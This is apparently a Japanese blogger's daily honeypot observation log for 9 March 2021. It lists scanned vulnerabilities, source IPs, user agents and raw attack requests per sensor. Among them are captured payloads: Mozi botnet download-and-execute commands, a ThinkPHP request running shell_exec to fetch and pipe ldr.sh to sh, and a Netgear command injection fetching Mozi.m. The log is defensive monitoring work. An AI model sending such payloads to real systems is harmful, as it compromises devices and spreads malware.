コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/03/09 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/03/09分です。

特徴
共通

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

FCKEditorの脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。

Location:US

WordPress Pluginへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//117[.]248[.]62[.]41:57848/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
cd /tmp;
rm -rf *;
wget http[:]//178[.]175[.]30[.]52:52397/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:UK

Oracle WebLogic脆弱性(CVE-2020-14882,CVE-2020-14883,CVE-2020-14750)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。

Location:SG

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
phpMyAdminへのスキャン行為
FreePBXへのスキャン行為
vtiger CRMへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

アクセス数推移

JP:総アクセス数:292 (前日比:+226)
US:総アクセス数:42 (前日比:-12)
UK:総アクセス数:87 (前日比:+60)
SG:総アクセス数:169 (前日比:+124)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 13.81.52.180 United States
34 40.114.104.207 United States
1 40.117.253.37 United States
5 42.194.225.150 China
22 45.155.205.225 Russia
2 51.120.95.9 United Kingdom
1 52.156.71.125 United States
1 52.228.31.184 United States
1 61.219.11.153 Taiwan
101 73.47.62.222 United States
8 89.190.156.31 United States
1 91.124.163.26 Ukraine
2 159.65.206.162 United States
1 161.97.128.124 Germany
1 163.172.70.120 United Kingdom
2 165.227.120.227 United States
1 172.104.242.173 United States
1 172.105.89.161 United States
101 188.153.166.132 Italy
1 203.159.80.134 Netherlands
1 204.93.154.215 United States
2 205.185.122.102 United States
1 217.160.175.141 Germany

UserAgent一覧

件数 UserAgent
9 -
1 Go-http-client/1.1
4 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
2 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
202 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
8 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
8 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
24 Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
6 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x16\x03\x01\x02
1 \x8f\x1c\xeaV*R\x9f\xee\xb2\xec>\xe0\x15\xe4I\xc0\x97\x96BK\xcc\n
14 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=curl+--user-agent+curl_tp5+http[:]//194[.]40[.]243[.]98/ldr.sh sh|HTTP/1.1
1 GET /WebItemsLevel.cfg HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
2 GET /admin/includes/general.js HTTP/1.1
2 GET /admin/view/javascript/common.js HTTP/1.1
2 GET /administrator/ HTTP/1.1
2 GET /administrator/help/en-GB/toc.json HTTP/1.1
2 GET /administrator/language/en-GB/install.xml HTTP/1.1
1 GET /blog/wp-admin/setup-config.php?step=0 HTTP/1.1
1 GET /cisco/spa122.cfg HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /configs/spa112.cfg HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media HTTP/1.1
2 GET /images/editor/separator.gif HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.0
2 GET /js/header-rollup-554.js HTTP/1.1
1 GET /login HTTP/1.0
1 GET /manager/html HTTP/1.1
2 GET /misc/ajax.js HTTP/1.1
202 GET /phpmyadmin/ HTTP/1.1
2 GET /plugins/system/debug/debug.xml HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /site/wp-admin/setup-config.php?step=0 HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /spa112.cfg HTTP/1.1
1 GET /test/wp-admin/setup-config.php?step=0 HTTP/1.1
2 GET /vendor/phpunit/phpunit/build.xml HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wordpress/wp-admin/setup-config.php?step=0 HTTP/1.1
1 GET /wp-admin/setup-config.php?step=0 HTTP/1.1
1 GET /wp-content/ HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET /wp-includes/js/jquery/jquery.js HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET /wp/wp-admin/setup-config.php?step=0 HTTP/1.1
1 GET /y000000000000.cfg HTTP/1.1
1 GET /yealink/WebItemsLevel.cfg HTTP/1.1
1 GET /yealink/y000000000000.cfg HTTP/1.1
1 GET /yealink/y000000000035.cfg HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 13.239.113.9 United States
1 20.80.168.68 United States
1 34.71.3.208 United States
1 40.87.150.70 United States
22 45.155.205.225 Russia
1 117.248.62.41 India
1 152.67.233.133 United States
2 159.89.88.122 United States
6 163.172.168.251 United Kingdom
1 172.105.89.161 United States
1 178.175.30.52 Albania
1 205.185.122.102 United States
2 209.127.181.90 Canada
1 213.163.126.131 Albania

UserAgent一覧

件数 UserAgent
6 -
2 Hello, world
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.5.3) Gecko/20100101 Firefox/52.5.3
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x02
1 \x8f\x1c\xeaV*R\x9f\xee\xb2\xec>\xe0\x15\xe4I\xc0\x97\x96BK\xcc
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
7 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//117[.]248[.]62[.]41:57848/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//178[.]175[.]30[.]52:52397/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//raspberry[.]fun/715587da83e159b6b04543ae5ccfeac08e558a65cbda7b4cc2ccbcba7b4eab8f3f1b32a1cea7e7b1eaa4dd64af72c4b8af938e9757baabfd659812bfa393f3f6113c7ca5ce6b07236b92ce14fe716f0e06014733ea6fef66c115018bd974f2b0 HTTP/1.1
1 POST http[:]//zwykle[.]xyz/e670df6404fad995bde85d5ad8822c9b46540329322d137b1c876846d721a5ea5e3625d327d9cee9261d4741326b6728bd87c4b4288e27b435e2ce7589c708514f81aa42996d84e8f8783fa508e060266861dbeb27520e96c65a60c8d71b7f1b HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 31.210.20.175 Netherlands
2 45.79.127.61 United States
11 45.155.205.225 Russia
1 52.161.158.29 United States
1 61.219.11.153 Taiwan
2 66.175.214.254 United States
1 89.248.165.180 United Kingdom
1 89.249.254.108 Russia
1 125.46.196.217 China
1 139.162.145.250 Netherlands
62 140.238.86.16 United States
1 171.25.193.77 Sweden
1 172.105.77.209 United States
1 205.185.122.102 United States

UserAgent一覧

件数 UserAgent
10 -
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
62 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
1 libwww-perl/6.52

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 \x16\x03\x01
2 \x16\x03\x01\x02
2 \x8f\x1c\xeaV*R\x9f\xee\xb2\xec>\xe0\x15\xe4I\xc0\x97\x96BK\xcc
1 GET /.env HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /api/spec.json HTTP/1.1
1 GET /cgi-bin/jarrewrite.sh
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /console/css/%252E%252E%252Fconsole.portal HTTP/1.1
1 GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1
1 GET /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
1 GET /console/images/%252e%252e%252fconsole.portal HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /level/15/exec/-/sh/run/CR HTTP/1.1
1 GET /nmaplowercheck1615227333 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /spec/api.json HTTP/1.1
1 GET /ui HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//google[.]com/ HTTP/1.1
1 HEAD /8Nbu HTTP/1.1
1 HEAD /actuator HTTP/1.1
1 HEAD /actuator/auditevents HTTP/1.1
1 HEAD /actuator/beans HTTP/1.1
1 HEAD /actuator/conditions HTTP/1.1
1 HEAD /actuator/configprops HTTP/1.1
1 HEAD /actuator/env HTTP/1.1
1 HEAD /actuator/health HTTP/1.1
1 HEAD /actuator/heapdump HTTP/1.1
1 HEAD /actuator/httptrace HTTP/1.1
1 HEAD /actuator/hystrix.stream HTTP/1.1
1 HEAD /actuator/info HTTP/1.1
1 HEAD /actuator/jolokia HTTP/1.1
1 HEAD /actuator/loggers HTTP/1.1
1 HEAD /actuator/mappings HTTP/1.1
1 HEAD /actuator/metrics HTTP/1.1
1 HEAD /actuator/scheduledtasks HTTP/1.1
1 HEAD /actuator/threaddump HTTP/1.1
1 HEAD /auditevents HTTP/1.1
1 HEAD /autoconfig HTTP/1.1
1 HEAD /beans HTTP/1.1
1 HEAD /cloudfoundryapplication HTTP/1.1
1 HEAD /configprops HTTP/1.1
1 HEAD /dump HTTP/1.1
1 HEAD /env HTTP/1.1
1 HEAD /health HTTP/1.1
1 HEAD /heapdump HTTP/1.1
1 HEAD /hystrix.stream HTTP/1.1
1 HEAD /info HTTP/1.1
1 HEAD /jolokia HTTP/1.1
1 HEAD /loggers HTTP/1.1
1 HEAD /mappings HTTP/1.1
1 HEAD /metrics HTTP/1.1
1 HEAD /threaddump HTTP/1.1
1 HEAD /trace HTTP/1.1
1 IKUN / HTTP/1.1
11 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 PROPFIND / HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 3.112.249.27 United States
1 13.239.113.9 United States
1 34.220.86.197 United States
1 41.142.100.168 Morocco
1 45.138.72.201 Russia
11 45.155.205.225 Russia
11 50.116.53.64 United States
1 61.219.11.153 Taiwan
12 69.25.114.212 United States
1 89.248.165.180 United Kingdom
1 103.217.121.185 India
10 106.12.172.48 China
1 120.6.226.108 China
101 128.199.251.119 United Kingdom
3 163.172.168.251 United Kingdom
1 172.104.242.173 United States
1 172.105.89.161 United States
2 178.62.242.101 United States
1 178.175.59.237 Albania
1 185.81.157.160 France
2 205.185.122.102 United States
3 212.47.244.68 France
1 217.160.175.141 Germany

UserAgent一覧

件数 UserAgent
16 -
1 Go-http-client/1.1
1 Hello, World
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
6 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 libwww-perl/6.52
5 python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.15.2.el7.x86_64

リクエスト内容一覧

件数 Method Request Protocol
1 -
7 \x16\x03\x01
1 \x16\x03\x01\x02
1 \x8f\x1c\xeaV*R\x9f\xee\xb2\xec>\xe0\x15\xe4I\xc0\x97\x96BK\xcc
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
7 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /2020/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /a2billing/customer/templates/default/footer.tpl HTTP/1.1
1 GET /about.php HTTP/1.1
1 GET /admin/config.php HTTP/1.1
1 GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /level/15/exec/-/sh/run/CR HTTP/1.1
1 GET /news/wp-includes/wlwmanifest.xml HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /recordings/ HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//120[.]6[.]226[.]108:37411/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vtigercrm/vtigerservice.php HTTP/1.1
1 GET /web/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /website/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1
1 GET /xmlrpc.php?rsd HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//cisza[.]website/d739371a0d76522d3fa73937ce99e63a5976b7964e2bd2970ef4fe237a5a820edeb8dce0b3ad7b39185536a6191149bc2cf43ad314df600059c225f236f4bc90664ee728476dcb8b5427a6f1d5446c05c5501375b3358f2d57dcbb499a36d39f HTTP/1.1
1 POST http[:]//sherrymckinney[.]xyz/43d6c6e6c7eab1dba29a3eff30476bbb2fab9e864ab429f0580914b8e2dd230fb9a3b87bd06242c4fd458e7ed768819ca9c3cb211c6059902a28df8c059050d88b4ac6a780eed1074111767d78dfd99fd47c4421cb651c6a195dcc09ec5c4370 HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf